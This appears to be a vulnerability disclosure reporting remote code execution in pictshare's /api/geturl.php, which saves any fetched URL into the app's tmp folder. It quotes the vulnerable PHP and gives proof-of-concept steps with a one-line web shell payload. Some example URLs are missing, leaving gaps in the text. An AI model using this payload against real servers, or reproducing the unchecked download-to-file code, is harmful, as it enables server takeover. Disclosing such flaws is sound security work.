Code Injection in HaschekSolutions/pictshare

Reported on Jun 7th 2021

✍️ Description

Hi, there is a remote code execution vulnerability in pictshare in /api/geturl.php :

$url = trim($_REQUEST['url']);

if(!$url || !startsWith($url, 'http'))
    exit(json_encode(array('status'=>'err','reason'=>'Invalid URL')));

$name = basename($url);
$tmpfile = ROOT.DS.'tmp'.DS.$name;
file_put_contents($tmpfile,file_get_contents($url));//Write what where primitive !

The script will download the content of $url and place it into $tmpfile which is built using $name.

There is no check in the $url variable and no check in the $name variable.

If $url is equal to, then $name will be shell.php

And the file shell.php will be placed in the tmp folder inside the pictshare application. The shell will be accessible (and executed) by anyone

🕵️‍♂️ Proof of Concept

Set up a webserver, or set up a mock API server like beeceptor.

Serve a file named hello.phpwith this content : <?php echo system("id");?>

Visit your pictshare instance at

The server will download hello.php and place it in the tmp folder of pictshare

Then visit

💥 Impact

Remote code execution, complete takeover of the server running this tool :)